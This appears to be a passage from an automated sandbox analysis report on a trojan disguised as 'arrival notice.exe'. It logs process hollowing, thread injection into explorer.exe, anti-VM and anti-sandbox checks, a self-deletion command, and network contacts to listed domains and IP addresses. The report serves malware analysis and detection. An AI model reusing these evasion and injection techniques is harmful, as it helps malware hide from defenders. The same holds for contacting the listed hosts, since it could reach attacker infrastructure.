          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_00978700 NtClose,10_2_00978700
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_009785CA NtCreateFile,10_2_009785CA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_009786FB NtClose,10_2_009786FB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0097867C NtReadFile,10_2_0097867C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_009787AC NtAllocateVirtualMemory,10_2_009787AC
          Source: arrival notice.exe, 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs arrival notice.exe
          Source: arrival notice.exe, 00000001.00000000.347284510.00000000002C2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIsolatedStora.exeh$ vs arrival notice.exe
          Source: arrival notice.exe, 00000001.00000002.381149131.0000000002647000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameEnvoySinks.dll6 vs arrival notice.exe
          Source: arrival notice.exe, 00000003.00000002.450859153.0000000000B62000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIsolatedStora.exeh$ vs arrival notice.exe
          Source: arrival notice.exe, 00000003.00000002.451810551.000000000159F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs arrival notice.exe
          Source: arrival notice.exe, 00000003.00000002.452694295.0000000003463000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs arrival notice.exe
          Source: arrival notice.exeBinary or memory string: OriginalFilenameIsolatedStora.exeh$ vs arrival notice.exe
          Source: arrival notice.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: arrival notice.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\arrival notice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\arrival notice.exe 'C:\Users\user\Desktop\arrival notice.exe'
          Source: C:\Users\user\Desktop\arrival notice.exeProcess created: C:\Users\user\Desktop\arrival notice.exe C:\Users\user\Desktop\arrival notice.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\arrival notice.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\arrival notice.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\arrival notice.exe.log
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@7/3
          Source: C:\Users\user\Desktop\arrival notice.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6240:120:WilError_01
          Source: arrival notice.exe, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 1.2.arrival notice.exe.220000.0.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 1.0.arrival notice.exe.220000.0.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 3.0.arrival notice.exe.ac0000.0.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 3.2.arrival notice.exe.ac0000.1.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\arrival notice.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: arrival notice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: arrival notice.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: colorcpl.pdbGCTL source: arrival notice.exe, 00000003.00000002.452677257.0000000003460000.00000040.00020000.sdmp
          Source: Binary string: colorcpl.pdb source: arrival notice.exe, 00000003.00000002.452677257.0000000003460000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: arrival notice.exe, 00000003.00000002.451810551.000000000159F000.00000040.00000001.sdmp, colorcpl.exe, 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: arrival notice.exe, 00000003.00000002.451810551.000000000159F000.00000040.00000001.sdmp, colorcpl.exe

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: arrival notice.exe, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.2.arrival notice.exe.220000.0.unpack, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.arrival notice.exe.220000.0.unpack, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.arrival notice.exe.ac0000.0.unpack, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.2.arrival notice.exe.ac0000.1.unpack, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 1_2_0022297F push 20000001h; retf 1_2_00222992
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_0041B87C push eax; ret 3_2_0041B882
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_0041B812 push eax; ret 3_2_0041B818
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_0041B81B push eax; ret 3_2_0041B882
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_00412A95 pushfd ; retf 3_2_00412A96
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_00415BB5 push eax; retf 3_2_00415BBB
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_004186CA push edx; retn 0076h3_2_004186CB
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_0040169B push es; iretd 3_2_0040169D
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_00414EA9 push es; ret 3_2_00414EAB
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_0041B7C5 push eax; ret 3_2_0041B818
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_00AC297F push 20000001h; retf 3_2_00AC2992
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B9D0D1 push ecx; ret 10_2_04B9D0E4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0097B812 push eax; ret 10_2_0097B818
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0097B81B push eax; ret 10_2_0097B882
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0097B87C push eax; ret 10_2_0097B882
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_00972A95 pushfd ; retf 10_2_00972A96
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_00975BB5 push eax; retf 10_2_00975BBB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0096169B push es; iretd 10_2_0096169D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_00974EA9 push es; ret 10_2_00974EAB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_009786CA push edx; retn 0076h10_2_009786CB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0097B7C5 push eax; ret 10_2_0097B818
          Source: initial sampleStatic PE information: section name: .text entropy: 7.50720151133

          Hooking and other Techniques for Hiding and Protection:

          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: /c del 'C:\Users\user\Desktop\arrival notice.exe'
          Source: C:\Users\user\Desktop\arrival notice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara matchFile source: 00000001.00000002.381135293.0000000002641000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: arrival notice.exe PID: 6224, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: arrival notice.exe, 00000001.00000002.381135293.0000000002641000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: arrival notice.exe, 00000001.00000002.381135293.0000000002641000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\arrival notice.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\arrival notice.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 00000000009685F4 second address: 00000000009685FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 000000000096898E second address: 0000000000968994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\arrival notice.exe TID: 6228 Thread sleep time: -33182s >= -30000s
          Source: C:\Users\user\Desktop\arrival notice.exe TID: 4552 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6696 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\colorcpl.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\arrival notice.exe Code function: 3_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\arrival notice.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\arrival notice.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\arrival notice.exe Thread delayed: delay time: 33182
          Source: explorer.exe, 00000004.00000000.438230835.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000004.00000000.395290671.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.432225748.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: arrival notice.exe, 00000001.00000002.381135293.0000000002641000.00000004.00000001.sdmp Binary or memory string: vmware
          Source: explorer.exe, 00000004.00000000.438230835.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
          Source: arrival notice.exe, 00000001.00000002.381135293.0000000002641000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: arrival notice.exe, 00000001.00000002.381135293.0000000002641000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: arrival notice.exe, 00000001.00000002.381135293.0000000002641000.00000004.00000001.sdmp Binary or memory string: VMWARE
          Source: explorer.exe, 00000004.00000000.436880664.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: arrival notice.exe, 00000001.00000002.381135293.0000000002641000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: arrival notice.exe, 00000001.00000002.381135293.0000000002641000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: arrival notice.exe, 00000001.00000002.381135293.0000000002641000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
          Source: arrival notice.exe, 00000001.00000002.381135293.0000000002641000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000004.00000000.436880664.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000004.00000000.395290671.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000004.00000000.403044652.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\arrival notice.exe Code function: 3_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\arrival notice.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\colorcpl.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 10_2_04B7F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B51B8F mov eax, dword ptr fs:[00000030h]10_2_04B51B8F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B51B8F mov eax, dword ptr fs:[00000030h]10_2_04B51B8F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BFD380 mov ecx, dword ptr fs:[00000030h]10_2_04BFD380
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C0138A mov eax, dword ptr fs:[00000030h]10_2_04C0138A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B837F5 mov eax, dword ptr fs:[00000030h]10_2_04B837F5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B703E2 mov eax, dword ptr fs:[00000030h]10_2_04B703E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B703E2 mov eax, dword ptr fs:[00000030h]10_2_04B703E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B703E2 mov eax, dword ptr fs:[00000030h]10_2_04B703E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B703E2 mov eax, dword ptr fs:[00000030h]10_2_04B703E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B703E2 mov eax, dword ptr fs:[00000030h]10_2_04B703E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B703E2 mov eax, dword ptr fs:[00000030h]10_2_04B703E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B6DBE9 mov eax, dword ptr fs:[00000030h]10_2_04B6DBE9
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C15BA5 mov eax, dword ptr fs:[00000030h]10_2_04C15BA5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC53CA mov eax, dword ptr fs:[00000030h]10_2_04BC53CA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BC53CA mov eax, dword ptr fs:[00000030h]10_2_04BC53CA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7E730 mov eax, dword ptr fs:[00000030h]10_2_04B7E730
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C18B58 mov eax, dword ptr fs:[00000030h]10_2_04C18B58
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B44F2E mov eax, dword ptr fs:[00000030h]10_2_04B44F2E
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B44F2E mov eax, dword ptr fs:[00000030h]10_2_04B44F2E
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B6F716 mov eax, dword ptr fs:[00000030h]10_2_04B6F716
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C18F6A mov eax, dword ptr fs:[00000030h]10_2_04C18F6A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BDFF10 mov eax, dword ptr fs:[00000030h]10_2_04BDFF10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04BDFF10 mov eax, dword ptr fs:[00000030h]10_2_04BDFF10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7A70E mov eax, dword ptr fs:[00000030h]10_2_04B7A70E
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7A70E mov eax, dword ptr fs:[00000030h]10_2_04B7A70E
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C1070D mov eax, dword ptr fs:[00000030h]10_2_04C1070D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C1070D mov eax, dword ptr fs:[00000030h]10_2_04C1070D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B73B7A mov eax, dword ptr fs:[00000030h]10_2_04B73B7A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B73B7A mov eax, dword ptr fs:[00000030h]10_2_04B73B7A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B4DB60 mov ecx, dword ptr fs:[00000030h]10_2_04B4DB60
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B5FF60 mov eax, dword ptr fs:[00000030h]10_2_04B5FF60
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C0131B mov eax, dword ptr fs:[00000030h]10_2_04C0131B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B4F358 mov eax, dword ptr fs:[00000030h]10_2_04B4F358
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B4DB40 mov eax, dword ptr fs:[00000030h]10_2_04B4DB40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B5EF40 mov eax, dword ptr fs:[00000030h]10_2_04B5EF40
          Source: C:\Users\user\Desktop\arrival notice.exe; Process queried: DebugPort
          Source: C:\Windows\SysWOW64\colorcpl.exe; Process queried: DebugPort
          Source: C:\Users\user\Desktop\arrival notice.exe; Code function: 3_2_00409B30 LdrLoadDll
          Source: C:\Users\user\Desktop\arrival notice.exe; Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe; Domain query: www.beerenhunger.info
          Source: C:\Windows\explorer.exe; Domain query: www.ilovecoventry.com
          Source: C:\Windows\explorer.exe; Network Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exe; Domain query: www.mybenefits51.com
          Source: C:\Windows\explorer.exe; Network Connect: 198.185.159.144 80
          Source: C:\Windows\explorer.exe; Domain query: www.singisa4letterword.com
          Source: C:\Windows\explorer.exe; Domain query: www.petrosterzis.com
          Source: C:\Windows\explorer.exe; Network Connect: 217.160.0.150 80
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\arrival notice.exe; Section unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: DD0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\arrival notice.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\arrival notice.exe; Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\colorcpl.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\colorcpl.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\arrival notice.exe; Memory written: C:\Users\user\Desktop\arrival notice.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\arrival notice.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\arrival notice.exe; Thread register set: target process: 3440
          Source: C:\Windows\SysWOW64\colorcpl.exe; Thread register set: target process: 3440
          Source: C:\Users\user\Desktop\arrival notice.exe; Process created: C:\Users\user\Desktop\arrival notice.exe C:\Users\user\Desktop\arrival notice.exe
          Source: C:\Windows\SysWOW64\colorcpl.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\arrival notice.exe'
          Source: explorer.exe, 00000004.00000000.438230835.00000000083E9000.00000004.00000001.sdmp, colorcpl.exe, 0000000A.00000002.615568503.00000000033E0000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.428120154.0000000000EE0000.00000002.00020000.sdmp, colorcpl.exe, 0000000A.00000002.615568503.00000000033E0000.00000002.00020000.sdmp; Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.428120154.0000000000EE0000.00000002.00020000.sdmp, colorcpl.exe, 0000000A.00000002.615568503.00000000033E0000.00000002.00020000.sdmp; Binary or memory string: &Program Manager
          Source: explorer.exe, 00000004.00000000.428120154.0000000000EE0000.00000002.00020000.sdmp, colorcpl.exe, 0000000A.00000002.615568503.00000000033E0000.00000002.00020000.sdmp; Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\arrival notice.exe; Queries volume information: C:\Users\user\Desktop\arrival notice.exe VolumeInformation
          Source: C:\Users\user\Desktop\arrival notice.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\arrival notice.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\arrival notice.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
